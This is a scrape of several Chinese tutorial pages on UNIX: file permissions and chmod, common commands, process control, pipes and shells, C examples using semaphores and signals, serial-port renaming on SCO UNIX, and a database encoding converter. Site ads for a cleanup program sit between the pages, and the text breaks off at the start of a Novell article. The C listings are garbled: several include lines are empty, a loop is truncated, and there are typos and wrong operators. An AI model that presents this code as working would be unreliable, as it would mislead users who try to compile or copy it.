drwx------ 2 b1503045 512 Feb 7 00:46 bin
drwx------ 2 b1503045 1024 Nov 1 16:43 c
-rw------- 1 b1503045 3051 Feb 7 01:49 dial-up
-rw-r----- 1 b1503045 37106 Feb 13 02:00 wwwfaq1
drwx------ 2 b1503045 512 Aug 11 1994 doc
lrwxrwxrwx 1 b1503045 11 Sep 5 20:36 docs -> /remote/doc
drwxr-xr-x 2 b1503045 512 Feb 7 00:43 pub
↓━━┬━━↓ ━━┬━ ━┬━ ━━┬━━━ ━━┬━━
凼
档案形式∶
- 一般档案。
d 目录。
l 符号链结档，（symbolic link file）用 ln -s 命令造成的，上例中，cd docs 和 cd /remote/doc 的效果是一样的。
c 字元式周边设备，以一个字元一个字元方式传输，如终端机。
b 区块式周边设备，能一次大量传输，如磁盘机。
s socket 档。
档案存取权限∶共九个字元，每三个分为一组，共三组 rwx 的组合。
前三个 rwx 是档案拥有人的权限，中间三个是所属群体（group）的权限，最後三个是其他人的使用权限。rwx 代表的意义如下∶
对档案而言 对目录而言
r 可读此档 可得知目录内有哪些档案
w 可修改此档 可在此目录内建档及杀档
x 可执行此档 可进入此目录内
- 无此使用权 无此使用权
⊙ 所谓的所属群体（group），在台大计中 ccsun 工作站，同系学生定为同一 group；在系计中 cctwin 工作站，同年级学生定为同一 group。
⊙ 以上例而言，wwwfaq1 这个档案自己可以读写，同一 group 的人只能读，其他人对此档完全没有存取权。
⊙ 自己的档案，可用 chmod 指令改变其存取权，有两种使用方法，如下∶
八进位法 -- chmod <八进位数> <档案>
此方法如同在画体育选课志愿卡，共三个八进位数字，r=4，w=2，
x=1，-=0。例如 -rwxr-xr-x 为 755，rw-r----- 为 640。如上例，若下 chmod 644 dial-up 即可将 dial-up 这个档的存取权从 600变成 644，亦即让其他人均可读此档案。其实最前面还有一个八进位数，但很少用到，其意义如下∶
4000 程式执行时，设定使用者识别码(SUID)位元为 on2000 程式执行时，设定使用者所属团体识别码(SGID)位元为 on
1000 sticky bit on，程式执行後会常驻记忆体。
符号法 -- chmod <who op 存取权> [<who op 存取权> ...] <档案>
<who> u (user) 档案拥有者
g (group) 所属 group
o (other) 其他使用者
a (all) 包括 u, g, o
<op> + 加上存取权
- 除去存取权
= 重新设定存取权
<存取权> 有 r, w, x, s, t （常用前三者）
例如，chmod u-w wwwfaq1 让自己不能更改 wwwfaq1 这个档案，chmod a+x a+r bin 允许所有人进入 bin 目录并可查看有哪些档案。档案连结（link）次数。档案拥有者。超级使用者（系统管理员）为 root。档案大小，单位为 byte。档案内容最近一次更新时间。
凼 档案名称。
□ 指令简介
⊙ ls 列出目录内档案名称（如 DOS 的 dir/w）
ls -l 除了列出档名外，并列出档案属性及拥有者、档案大小及建立时间
等资讯
ls -a 列出所有档案，包括隐藏档
ls -R 递回地列出所有档案（子目录内所有档案亦列出）
ls -F 依档案格式分类
可执行档档名後加'*'，目录名称後加上'/'，link档档名加上'@'
⊙ pwd 查询目前所在之目录名称
⊙ cd 更换目前工作目录位置
若只打 cd 不加目录名，则回到自己的 home directory
回到上一层目录，必须打 cd .. ，cd 和 .. 中间要有空白
⊙ cat 查看文字档内容
⊙ more 以一页一页方式显示一个文字档
当最後一行出现 --more(16%)-- ，表示你已看了 16% 的文章。此
时可用 more 内的指令∶
space 往下卷动一页
Enter 往下卷动一行，若先键入数字再按Enter可下卷指定的行数
q 或 Q 停止输出，回到系统提示符号
h 显示可用指令及其功能
⊙ cp <原始档> <复制档> 就是 copy 啦！
⊙ mv <原始档> <目的档> 若原始档和目的档在同一目录下，可更改档名，
若加上路径名，可在目录间搬移档案
⊙ rm 删除档案，若加上 -i 会徵求确认後删除
rm -r <目录名> 删除该目录及该目录之下的所有档案
rm -rf 同上，但不会先徵求确认
注∶UNIX没有undelete，杀档前请确定你的大脑很清醒
⊙ mkdir 建立子目录
⊙ rmdir 删除子目录，目录内须无档案
⊙ chmod 设定档案或目录的存取权限
⊙ lpr 将档案放进 printer queue 中等候列表
⊙ lpq 显示 printer queue 的内容
⊙ lp 列印资料
⊙ lpstat 查询列印状态与印表机相关资讯
⊙ pr 文字档之格式化输出
□ 进阶指令
⊙ grep 於档案中寻找特定字串
例∶grep fopen *.c 可印出所有 *.c 档案中，有 fopen 字串的
那一行。
⊙ tail 印出档案最後 10 行内容
tail -200 印出档案最後 200 行内容
⊙ which 查询某个执行档是放在那个路径之下
⊙ od 以八进位察看档案内容
⊙ ln 连接(link)档案
ln -s symbolic link
⊙ wc 计算档案的行数、字数及字元数
⊙ touch 更改档案修改或被存取时间
⊙ diff 档案比较
⊙ find 档案搜寻
⊙ df 显示可使用之档案储存空间及档案数目
⊙ du 计算磁盘机使用情形
⊙ umask 建档时，取消部份存取权
⊙ tee 将 stdin 输出到 stdout 并复制一份於档案中
○ 第三节 通信指令 ○
□ 指令简介
⊙ rusers 查看有哪些人上机
⊙ ku 比 rusers 更好用，并提供 finger, talk, write, mail 等功能。
⊙ mesg y 接受其他使用者讯息（系统预设值）
mesg n 拒绝其他使用者讯息
⊙ talk 线上一对一交谈系统，对方必须在线上才能使用，可让同一主机或
使用相同网路协定的不同主机的使用者交谈，若要使用中文请用
ctalk。
○例如，若你使用台大计中工作站，发现你的朋友 b2503000 正在
使用 ccsun22 这台机器，可下 talk b2503000@ccsun22 这个指
令，接著等待回音，若对方愿意和你聊天，则萤幕画面将会分为
上下两部份，上半部份为自己输入的讯息，下半部份则是对方的
应答。
○按下 Ctrl-C 可结束对话
○若 b2503000 要和你聊天时，会出现如下画面
Message from Talk_Daemon at 11:21
talk: connection requested by b2503000@ccsun22
talk: respond with talk b2503000@ccsun22
若想回答请输入 talk b2503000@ccsun22 再按 Enter 即可
○此时若萤幕内容混乱，在某些软体中可按 Ctrl-L 重绘萤幕文字
，若你正在编辑文件，该文件也不会受影响，仍可继续编辑。
○若你不想和他 talk ，可用 mesg n 命令拒绝。
○若远方机器与本地机器相容，亦可使用此命令和远方机器使用者
聊天，例如∶talk u8234567@ccsun19.cc.nctu.edu.tw
即可和交大 ccsun19 上的 u8234567 聊天
⊙ finger 可查询本地机器或远方机器使用者简要资料
例∶finger b1503045@cc.ntu.edu.tw
⊙ mail 读取及传送电子邮件
以下指令可利用 mail 传送文字档
mail user < filename
⊙ write 送讯息给其他在系统中的使用者，也可视为功能较差的 talk 程式
，记得按 Ctrl-D 结束
⊙ rlogin,rsh,telnet 远端登录(login)
□ 进阶指令
⊙ vacation 自动回应来信
○ 第四节 系统资讯 ○
□ 指令简介
⊙ quota -v 察看自己可用磁盘空间大小（单位∶KB）及档案个数
⊙ date 现在的日期、时间
⊙ who 查询目前和你使用同一机器的有哪些人及login时间地点
⊙ w 查询目前上机者详细状况
⊙ whoami 察看自己帐号名称
⊙ groups [帐号名] 查看某人的 group
⊙ yppasswd 更改密码
⊙ ypchsh 更改自己的 login shell
⊙ ypchfn 更改自己的全名（full name，不是帐号名）
⊙ cal 印出月历或年历
⊙ tty 显示目前所用终端机名称
⊙ history 查看自己下过的指令
□ 进阶指令
⊙ nslookup 向 Name Server 查询 hostname 及 IP
○ 第五节 处理程序（Process）的控制 ○
□ 指令简介
⊙ ps 显示 process 的状态（process status）
PID 栏∶即 ProcessID,一个正在执行的程式在系统中的唯一编号
Owner栏∶该 process 的拥有者
⊙ kill 停止处理程序，通常先用 ps 命令查得 Process ID，再杀之
kill -9 立即停止一个 process
kill -9 -1 杀掉系统内所有属於自己的 process
○ 若在工作站上无法离线时，可先 login 另一台工作站，然後再 rsh
到原来当掉的工作站，下 kill -9 -1 指令即可正常退出。
⊙ jobs 列出现在正在执行的工作
⊙ fg 将中止的 job 回到前景继续执行
⊙ bg 背景执行
□ 进阶指令
⊙ at 在指定时间执行命令
⊙ batch 依序执行多个命令
⊙ crontab 要求系统定期执行特定命令
⊙ nice 调整 process 的优先权
⊙ nohup 使 process 在 logout 後继续执行
○ 第六节 其他命令 ○
□ 指令简介
⊙ cc C Compiler
⊙ compress 将档案压缩成 *.Z 格式
⊙ uncompress 将 *.Z 格式的压缩档解压
⊙ alias 替命令取别名
例∶alias dir 'ls -al'
以後打 dir 就等同於下 ls -al 命令
⊙ set 查看或设定 shell 变数
○ 这里介绍几个重要的变数∶
home∶你的 home directory.
path∶和 DOS 的 path 变数功能一样，系统会顺著 path 中的目录
去找可执行档。
term∶终端机形态，常用 vt100、vt102、ansi。
○ set <变数名>=<设定值> 就可以设定变数的值，$<变数名> 代表此变数
的值。例如∶set term=vt100 ; set path=($home/bin $path)
另外须注意 path 的第一个目录最好不要设为 . ，这是系统安全的考量
⊙ setenv 查看或设定环境变数
⊙ echo 回应讯息到标准输出
⊙ sort 资料排序
⊙ su 权限转换为指定使用者
⊙ banner 放大特定字串
⊙ calendar 重要事项提醒
⊙ spell 拼字检查
⊙ sleep 暂停一段时间不使用 CPU（通常用在 Shell Script）
⊙ test 测试档案型态或检查字串、数值大小（通常用在 Shell Script）
⊙ wait 等待 process 执行结束（通常用在 Shell Script）
○ 第七节 终端机常用控制键 ○
□ Ctrl-C 中断程式的执行。
Ctrl-Z 暂停程式的执行，稍後可下 fg 或 bg 指令继续，若未下 fg 或
bg 指令继续执行，该 process 仍会留在系统内。
Ctrl-S 或 Pause 键 萤幕暂停输出
Ctrl-Q 萤幕恢复输出
Ctrl-D EOT (End of Transmission)
□ 有时候按了键盘，萤幕却没任何反应，看起来好像当机，可能就是不小心按了
Ctrl-S 键，此时按 Ctrl-Q 就可恢复正常。
□ 若你输入中文时，萤幕却出现乱码，请先於 UNIX 提示符号下打 stty pass8，
系统就不会过滤字元的 bit7(the most significant bit)。
□ 若你进编辑器或者其他的全萤幕程式，出现萤幕文字上卷的问题时，请先於
UNIX 提示符号下打 stty rows 24 或 resize 就可恢复正常。
○ 第八节 管道（pipe）及输出入重导（redirection） ○
□ UNIX 把输出入设备亦视为档案，这些设备可能是键盘，萤幕，印表机，也可以
是磁盘档，以下是 UNIX 的标准输出入设备∶
⊙ 标准输入（stdin）
平时为键盘，可用 < 转向。
例∶mail b82000 < myfile 可将 myfile 档案寄给 b82000
⊙ 标准输出（stdout）
平时为萤幕，可用 > 转向，用 >> 可将结果附加（append）在档案尾端。
例∶finger b81045 > myfile 可将查询结果写在 myfile 档案上。
⊙ 标准错误输出（stderr）
平时为萤幕，如 stdout 被转向，仍可在萤幕看到错误讯息。 stderr 可用
>& 转向，用 >>& 将错误讯息附加在档案尾端。
□ 管道∶管道的符号是 "|"，用来连接两个命令。"|" 左边指令的输出作为 "|"右边指令的输入。例∶ls -l .. | more 可将上一层目录内容以一页一页方式输出；who | grep b.503 | sort | more 可将目前上线的电机系学生名单经过排序後分页输出。
○ 第九节 Shell 与 Shell Script 简介 ○
□ DOS 的 COMMAND.COM 就是一种 shell，负责解译你所下的指令并执行它。同样的，UNIX 上也有这样的东东，它是在你成功 login 以後由系统自动启动的。UNIX 上有不少种 shell，sh, csh, ksh, tcsh, bash 等皆是，一般都是用csh，login shell 可用 ypchsh 命令改变，但你必须先知道你要换的新壳子在那个目录下。tcsh 有类似 DOSKEY 的功能，值得推 。
□ DOS 中有所谓的批次档，用以方便处理一些例行工作。UNIX 也有批次处理，它就叫做 Shell Script，而且比 DOS 的批次档强很多，写法几乎是一个高阶语言。Shell Script 是个文字档，但其地位和其它的命令或可执行档是完全相同的，只要用 chmod 指令将 Shell Script 存取权设为可执行即可。欲知 Shell Script 写法及其相关细节，请参阅 manual page 或 UNIX 相关书籍。
□ $home 目录下的 .login 档就是一个典型的 Shell Script，类似 DOS 的autoexec.bat。
○ 第十节 X Window 视窗系统简介 ○
□ 若你在工作站主机 login，可打 startx 或 openwin 指令进入 X Window 系统，进入 XWindow 後按滑鼠左键或右键不放，可看到系统选单，选择你要执行的程式，选 Exit 就可离开 XWindow 系统。进入 X Window 後可启动 cxterm 就有中文视窗。
□ X Window 系统大而繁杂，但操作上不难，欲深入 解其功能可参阅 X Window的标准本 <The X Window System, Volume 3: X Window System User's Guide for X11R5> 。网路上也有免费的 X Window 入门指南中文本，可进各大gopher 站查阅或抓取。

返回


UNIX操作系统中进程通信机制的应用

《一键清理系统垃圾》

UNIX操作系统中进程通信机制的应用

    UNIX系统具有丰富的进程通信手段，其中包括信号、信号灯、管道、消息传递等，这些进程通信机制能有效地完成多个进程之间的信息共享和数据交换，从而保证进程间的协同工作，本文给出了利用信号和信号灯完成特定工作的两个实例。

    一、信号灯互斥功能的应用

    在多用户操作系统中，信号灯是防止两个或多个进程同时访问共享资源的一种机制。在铁路系统中信号灯可防止两列火车在同一轨道上相撞在计算机系统中，信号灯能保证访问共享资源不会发生混乱。互斥操作要求任何时刻只能有一个或一类进程访问信号灯(执行一个特定的代码区域)。

    互斥的应用非常广泛，UNIX操作系统提供了多种用户对共享资源的访问方法；多用户数据库管理系统为保证数据的完整性提供了加锁和解锁功能。另外在设计管理信息系统时经常要进行汇总处理，此时需要加入完全互斥功能；在设计操作员注册管理程序时，有时要求同一时刻只允许每个操作岫次，这就要求具有部分互斥功能。

    下面的TEST.C程序程序说明了利用信号灯实现互斥的方法，其中函数Initsem()根据互斥条件确定是否进入互斥临界区，在需进入完全互斥时，只需将KEY 为某个常量即可。

    test c

    # include

    # include

    main (argc,argv)

    int argc;

    char * argv []

    {

    int semid;

    if ( (semid=initsem(operate-ID))

    P (semid) ;

    · /*临界区*/

    ·

    ·

    V (semid) ;

    ·

    ·

    ·

    initsem(op)

    char * op;

    {

    int id,status=0,semid;

    key-t Key ,ftok()

    id=atoi(op);

    key=ftok(getenv("HOME"),id);/*相同Key值互斥*/

    if (semid=semget(key,1,SEMPERM‖IPC-CREAT‖IPC-EXCL))==-1)} if (errno==EEXIST)

    semid=semget(key,1,0);

    }

    else/*if created...*/

    status=semct1(semid,0,SETVAL,1);

    if(semid==-1‖status==-1){

    perror("initsem failed")

    return(-1);

    }else

    return(semid);/*all okay*/

    }

    P (semid)

    int semid;

    {

    struct sembufp-buf;

    p-buf.sem-num=0;

    p-buf.sem-op=-1;

    p-buf.sem-flg=IPC-NOWAIT;

    if (semop (semid, & p-buf,1)==-1) {

    perror ("p (semid) falsed");

    exit (1);

    } else

    return (0);

    }

    V (semid)

    int semid;

    {

    struct sembufv-buf,

    v-buf.sem-num=0;

    v-buf.sem-op=1;

    v-buf.sem-flg=IPC-NOWAIT;

    if (semop (semid, &v-buf,1)==-1) {

    perror (" v (semid) failed");

    exit (1);

    } else

    return (0)

    }

    #include

    #include

    extern int errno;

    #define SEMPERM 0600

    #define TRUE1

    #define FALSE 0

    二、用信号实现打印进程的控制

    在大多数应用程序中，都包含打印模块，以实现报表、文本等信息的打印， C程序员常用fprint (fp,"")来设计打印程序，打印流程不能中断。若打印信息很长时，用户常遇到意外情况，如打印机卡纸等，此时一般要重新打印报表，浪费时间和纸张，因此打印程序能随时中断和继续，使用户能随时处理一些打印中出现的问题是非常必要的。

    C语言中的标准函数signal(sig,func)可实现软中断，其功能为：当接收到信呈sig时，程序转去执行函数func，func返回后，程序从中断处继续执行重复使用中断需重新调用signal函数，另外一对标准函数setjmp(pos)和longimp(pos,arg) 可是实现远程跳转，setjmp(pos)能把控制传回被保存的位置，其中变量arg 作为setjmp()的返回值。

    根据以上所述，笔者编写了下列打印程序，使用户在打印过程中遇到异常情况需要处理时，可以按DEL键中断打印，程序转而执行PRSTOP函数，通过输入某种条件，决定从中断处继续打印或远程跳转以完成退出打印或重新打印等功能。

    #include

    #include

    #include

    jmp-buf pos; /*保存堆栈环境*/

    main()

    {

    FILE * fp;

    int i,n,c,prstop();

    fp=fopen("/dev/lp0","w");

    c=setjmp(pos); /*跳转位置*/

    if(c==1)exit(0);

    signal(SIGINT,prstop);

    printf("按DEL键可暂停打印\n");/*DOS下用CTRL-C键*/

    i=0;

    n=30;

    while(i++

    /*打印报表*/

    fprintf(fp,"LINE %d TEST TEST TEST TEST \n",i);

    }

    fclose(fp);

    exit(0);

    }

    prstop()

    {

    char c;

    printf("打印被中断，请选择:\n");

    read(0,&c,1);

    if(c!='0')longjmp(pos,c-'0'); /*跳转*/

    /*PRSTOP返回从中断处继续打印*/

    }

返回


UNIX的Shell命令详解

《一键清理系统垃圾》

UNIX的Shell命令详解

1. 输出入转向

在 UNIX 中，每一个 process 均有三个特殊的 file descriptor , 标准输入( standard input )、标准输出 ( standard output )、标准错误输出( standarderror )。这三个平常是接受 terminal 的输入，而由 terminal 显示出去。但是UNIX 提供使用者可以使用一般的档案或 pipe 来取代这些标准输出入设备。在tcsh 里头，使用者可以利用">"和"<"来进行输出入转向的工作。

输出转向:
command > file

你可以将一个指令的输出结果转向到一个档案，让此档案储存这个 command的输出结果。

但是请注意，如果 file 已经存在在系统中，则 file 将会被盖过。也就是原先 file 的内容将会消失。

command >& file

与 > 相同，但是这个格式表示连 standard error 一起转向。在 UNIX 中，standard error 在 programer 的习惯是用来显示 error 的发生，因此如果没有被转向时， standard output 的结果将会被转向到 file ，而 standard error 的结果仍将显示在 terminal 上。

command >> file

此格示代表将 standard output 的结果 append 到 file 中。如果 file 已存在在系统中，则 standard output 的结果将会加到 file

返回


UNIX基础

《一键清理系统垃圾》

UNIX基础

    在最终使热联线决定录用的个人简历中我说我精通Unix。但实际上这并不是事实。Unix中仍然有很多我不了解的东西。当我夹着一本UNIX入门赶到三藩的办公室时，我发现给我配备的电脑不是我所希望的Macintosh，而是一台漂亮的紫色SGI。

我认识到我必须加紧学习Unix。首先我学用的是SGI的图形用户界面，这个界面和Macintosh 桌面的界面很相似。但我很快发现速度太慢。所以赶快找乐几本更好的Unix书籍，并找到一个好心的Unix 专家帮助我，很快我就能够象闪电那样使用cp、mv和chmod命令。

Unix偶尔还令我感到后怕，但是我还是很喜欢它。它的速度非常快，非常有用。而且如果在你的简历上有一条精通UNIX的记录，你被录用的机会将增加数倍。

我准备了一下有关UNIX的入门知识。但是我要先提醒你，UNIX非常强大，你错误的键盘指令很有可能将你的文件吹到十万八千里之外，你可能将永远无法挽回。所以在你打算移动某些文件之前先拿样本作一下练习。

开始

首先，你需要登记一个帐户。找一个服务器管理员、系统管理员或Unix管理员请他给你注册一个帐户和一个用户目录。并向他们保证你不会经常问他们问题烦他们。尽管这一条对我来说常常只是大白话。

注意Unix系统的安装方法有很大的区别。如果什么东西在你这里不能用，则说明有某个系统没有安装或系统配置不对。还有可能是因为你在使用一种不同的UNIX系统，所以拟定指令可能同其他的UNIX系统存在某些区别。如果你碰到说明问题，去向给你帐户的人寻求帮助，但记住一定要带点儿礼物。

获得帐户后，去书店买几本Unix的书。

Telnet

要进入你的帐户，你需要一个shell程序 (将你所键入的任何东西都传输到主机的程序)。最方便的办法是开启一个Telnet视窗。如果你用的就是主机，则你已经有了shell。用Telnet获取文件的方法和在你的MAC机上打开chooser或在PC机上打开网上邻居的方法基本相同，不同之处在于当你进入文件结构的时候，你不会那些五颜六色的目录。

所以打开Telnet，并从File菜单中选择打开联结（Open Connection），填入主机地址（Host/Session Name） ，然后点击联结（ Connect）。它会提示你输入用户名和口令。你应该还有一个用户子目录。当你登录时，你会遇到：

IRIX (sutro)

login: pam

Password:

IRIX Release 5.3 IP20 sutro

Copyright 1987-1994 Silicon Graphics, Inc. All Rights Reserved.

Last login: Fri Dec 13 14:04:59 PST 1996 by UNKNOWN@hill.hotwired.com

You have mail.

sutro[~]%

在你登录的时候你可能看不到你的用户子目录，但你的用户子目录应该如同下面的例子：

sutro.hotwired.com[~]%pwd

/usr/people/pa

返回


UNIX系统中改变串口设备名称的方法

《一键清理系统垃圾》

UNIX系统中改变串口设备名称的方法

---- UNIX 中 的 标 准 串 行 设 备com1,com2 名 称 为tty1a,tty1A,tty2a，tty2A,ttyXA 是
接Modem 的 端 口， 不 接 则 为ttyXa。 若 要 增 加 一 块 多 用 户 卡， 首 先 必 须 了 解 其 为 智 能 卡 还 是
与unix 系 统 兼 容 的 标 准 卡， 一 般 智 能 卡 上 有CPU， 如i960,TMS320 或80286， 厂 家 提 供 安 装
驱 动 程 序， 而 后 者 是 以com1 或com2 方 式 安 装， 其 分 别 利 用 中 断3 和 中 断4， 在 系 统 提 示 下 输
入 命 令：# /etc/mkdev serial 来 完 成。
---- 无 论 安 装 哪 一 种 卡， 安 装 成 功 后 在/dev 下 会 出 现ttyxx 的 设 备 名 称，
如tty1a,tty2b,tty2a,ttye11 ….., 编 辑 # vi /etc/inittab 文 件， 会 有：
......
Se1a: 234 : off : /etc/getty tty1a m
Se1A: 234 : off: /etc/getty -t60 tty1A 3
......

---- # enable tty1a 则 端 口 被 激 活， 连 接tty1a 的 终 端 即 会 出 现 login: 。 而 在 实 际 运
用 中 有 一 些 端 口 设 备 的 名 称 已 被 固 定 写 入 可 执 行 程 序 中 不 能 改 动， 只 能 调 动 原 来 已 有 的
设 备 名 称， 如 何 利 用 已 有 的 设 备 来 映 射 程 序 中 的 设 备 名 称 呢 ？ 以tty1a 为 例， 欲 改
为tty21a， 首 先 编 辑 # vi /etc/conf/node.d/sio 将 sio tty1a c 0 一 行 中 tty1a 该 为
tty21a ， 然 后 编 辑 # vi /etc/conf/init.d/sio 将 Se1a : 234 off : /etc/getty
tty1a m 一 行 中tty1a 改 为tty21a 重 建 内 核 # /etc/conf/bin/idbuild
---- # sync;reboot
---- 机 器 重 新 启 动 后 编 辑 # vi /etc/inittab
---- 原 来 Se1a : 234 : off: /etc/getty tty1a m 一 行 中 的tty1a 变 为tty21a
---- # vi /etc/ttytype
---- 增 加 一 行 ansi tty21a 设 定tty21a 的 终 端 类 型 为 ansi。
---- /dev 下 会 产 生 一 个tty21a 的 设 备 名 称， 此 时#enable tty21a , 则 原 先 连 接tty1a
端 口 的 终 端 会 出 现login : ， 说 明 名 称 改 变 有 效。 若 再 #enable tty1a , 即 会 提 示 非
法tty 名 称 错 误。
---- 此 方 法 特 别 适 用 于 串 口 设 备 改 变 但 又 不 便 改 动 运 行 程 序 的 场 合。 以 上 示 例 分 别
在SCO Unix 3.2.4.2 和 OpenServer 5.0 下 调 试 通 过。

返回


基本指令

《一键清理系统垃圾》

基本指令

    我列出了几项基本指令。大部分的指令都有若干选项，这些选项使得这些指令功能更加强大。你可以在Unix在线指南中找到具体的用法。

ls -列出某个子目录中的文件。
语法: ls [选项] [名称]

显示结果应该如同下面的例子：

sutro.hotwired.com[~]% ls

airwolf.au goo.html unixclass

apanel.parameters graphics

在这个例子中，我的用户子目录中有两个文件(airwolf.au和goo.html)和3个下级子目录 (unixclass, apanel.parameters, and graphics) 。

cd - 改变子目录
语法：cd [dir]

例：

sutro.hotwired.com[~]% cd unixclass

sutro.hotwired.com[~/unixclass]% ls

one one.html two two.html

sutro.hotwired.com[~/unixclass]%

在本例中，我从用户子目录改变到unixclass 子目录，在该子目录中有两个文件和一个下级子目录（如果你想返回原来的子目录，则使用% cd ../).

mv - 移动或重命名一个文件或子目录
语法：mv [选项] 源文件/子目录 目标

例

sutro.hotwired.com[~/unixclass]% mv one/ two/

sutro.hotwired.com[~/unixclass]% ls

one.html two two.html

sutro.hotwired.com[~/unixclass]% ls two/

one

sutro.hotwired.com[~/unixclass]%

我将子目录one移到了子目录two。

如果你用mv重命名一个文件或子目录，则：

sutro.hotwired.com[~/unixclass]% mv two/ somethingdifferent

sutro.hotwired.com[~/unixclass]% ls

one.html somethingdifferent two.html

在本例中我将子目录two重命名为somethingdifferent。

rm - 删除一个文件
语法：rm [选项] [文件]

例：

sutro.hotwired.com[~/unixclass]% rm one.html

sutro.hotwired.com[~/unixclass]% ls

somethingdifferent two.html

我删除了子目录unixclass下的文件。

rm -ir - 删除一个子目录

例：

sutro.hotwired.com[~/unixclass]% rm -ir somethingdifferent/

Directory somethingdifferent/. Remove ? (yes/no)[no] : yes

Directory somethingdifferent//one. Remove ? (yes/no)[no] : yes

sutro.hotwired.com[~/unixclass]% ls

two.html
在本例中，我用rm -ir 指令删除子目录 somethingdifferent。在删除该子目录之前，我必须确认我要删除该子目录。一旦我确认删除之后，子目录 somethingdifferent将不复存在。所以使用 rm时一定要谨慎，因为，一旦执行该命令，该文件或子目录将－－－－覆水难收 ...

mkdir - 建立新子目录
语法：mkdir [选项] 新子目录名
例：

sutro.hotwired.com[~/unixclass]% mkdir waga

sutro.hotwired.com[~/unixclass]% ls

two.html waga
我用mkdir建立了新子目录waga。

more - 分屏过滤或者叫分屏显示（more）一个文件，当你只是想阅读一个文件而不编辑它时。

less - less的功能和more类似，但它还允许你在一个文件内执行查询功能。

exit - 从登录的主机退出

date - 显示当前日期和时间cal 1997 - prints the 1997 calendar

whoami - 显示当前登录到你的终端的用户

mail - 调出一个简单的邮件编辑器

pwd - 告诉你当前你所在的位置，它显示当前子目录的完整路径名。

Unix在线指南

如果你项了解各个指令的细节，你可以查询Unix的在线指南man。例如如果你想了解ls，键入

sutro.hotwired.com[~/unixclass]% man ls
你就会看到:

ls(1)

NAME

ls - list contents of directory

SYNOPSIS

ls [-RadLCxmlnogrtucpFbqisf1AM] [names]

DESCRIPTION

For each directory argument, ls lists the contents of the directory; for

each file argument, ls repeats its name and any other information

requested. The output is sorted alphabetically by default.

返回


如何实现不同数据存储模式之间的数据转换

《一键清理系统垃圾》

返回总目录 上一页 目录页

如何实现不同数据存储模式之间的数据转换

我们许多国内用户曾经大量使用的数据库管理系统是XBASE系列(如dBASE、FoxBASE和 F
oxPRO等)数据库管理系统。也有许多银行曾采用UNIFY数据库。随着数据库技术的发展和U N
IX/XENIX的普及,许多用户重新采用一些先进的大型关系数据库如(ORACLE、INFORMIX和SY
BASE)建立新的业务系统,这样就产生了一个数据移植的问题,如果重新用手工将数据录入新系统,显然太浪费人力。那么如何使用计算机自动转换数据呢?
任何两种不同类型的数据库都可以通过一种中介文件来进行数据转换,这个中介文件就是文本文件。任何一种数据库都可以通过相应命令,将数据库中数据生成ASCII文本文件,也可以将文本文件中　数据转入数据库中。但在转换过程中必须注意一些问题。下面分别举例说明。

一、dos操作系统中数据向unix/xenix系统中传送。
如果要将dos系统下的Foxplus数据库中数据,转换到unix中的INFORMIX数据库中。那么首先要将Foxplus数据库中数据转换成文本文件txt,然后将形成的文本文件拷入dos盘中。再将此dos盘中文件通过unix的shell命令doscp拷入unix系统中,再用load命令将此文本文件装入INFORMIX的数据表中。在转换过程中还必须注意数据类型的问题,Foxplus数据库的日期型数据是yy/mm/dd形式(也可以设成其他形式),但拷入txt文本文件后就成了带世纪的19yy
mmdd形式,而INFORMIX所需的形式为mmddyy式,故转换时需重新组合。
二、汉字使用中西文两字节的数据库与使用引荐符三字节汉字的数据库之间的数据转换。
有许多银行的应用软件原来是采用UNIFY数据库开发的,如今一些单位又基于INFORMIX ,SY
BASE,COBOL等数据库重新开发了系统。在移植数据时出现了汉字模式不一致的问题。比如
,我行原来使用的储蓄系统是基于UNIFY数据库开发的,后来要将其中大量数据移入总行开发的COBOL系统中,可是UNIFY数据库中汉字使用引荐符三字节,而COBOL系统中使用的汉字是中西文两字节,所以,从UNIFY中转出的包含汉字的文本文件中的数据,必须经过汉字模式转换才能移入COBOL系统中。为此,笔者用C语言做了一个转换程序,将txt文件中的引荐符三字节汉字转换成中西文两字节的汉字。具体程序如下:

chang3-2.c
#include＜stdio.h＞
main()
{
FILE *fp1,*fp2;
int c;
/*three.txt为包含引荐符三字节汉字的文本文件*/
if ((fp1=fopen("three.txt","r"))=NULL)
{
printf("three.txt文件打开失败!\n");
exit(0);
}
/*two.txt为转换出的汉字模式为中西文两字节的文本文件*/
fp2=fopen("two.txt","w");
c=getc(fp1);
while(c!=EOF)
{
if(c=='\') /*引荐符为"\"*/
{
putc(getc(fp1)|0x80,fp2); /*将高位置"1"*/
c=getc(fp1);
putc(c|0x80,fp2);
}
else
putc(c,fp2);
c=getc(fp1);
}
fclose(fp1);
fclose(fp2);
return;
}

经过以上程序转换的文本文件中的数据,就可以直接转入COBOL系统数据库或其他可使用中西文两字节汉字的数据库中了。
总之,用计算机自动转换数据会很快捷,也有很多办法,但转换时一定要注意两种数据结构数据类型的一致,否则就会产生错误。

返回


UNIX

《一键清理系统垃圾》

返回总目录

UNIX

◎SCO UNIX 上 活 动 硬 盘 的 安 装
◎SCO UNIX环境下重建Oracle7数据库
◎SCO UNIX环境下自动增加网关的两种方法
◎SCO UNIX系统故障特征、分析及解决
◎SCO UNIX下磁盘设备的应用管理
◎SCO XENIX/UNIX系统磁带机及光驱的安装
◎SCO XENIX Ver2.3.4中两个有用的DOS拷贝命令
◎SCOUNIX如何使用IDE光驱
◎UNIX 口令安全简介
◎UNIX 作业系统操作简介
◎UNIX操作系统中进程通信机制的应用
◎UNIX的Shell命令详解
◎UNIX基础
◎UNIX基础
◎UNIX系统中改变串口设备名称的方法
◎基本指令
◎如何实现不同数据存储模式之间的数据转换

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


Novell双网卡的使用问题

《一键清理系统垃圾》

返回总目录 目录页 下一页

Novell双网卡的使用问题

    我厂使用的是Novell服务器， 版本为Novell NetWare 4.11。
    问题:使用NW4SP8(或NW4SP8A)打补丁后，每次重新开机，只有一网卡正常工作，另一网卡不起作用，在服务器运行时，删除网卡驱动再重新加载，另一网卡才正常工作。
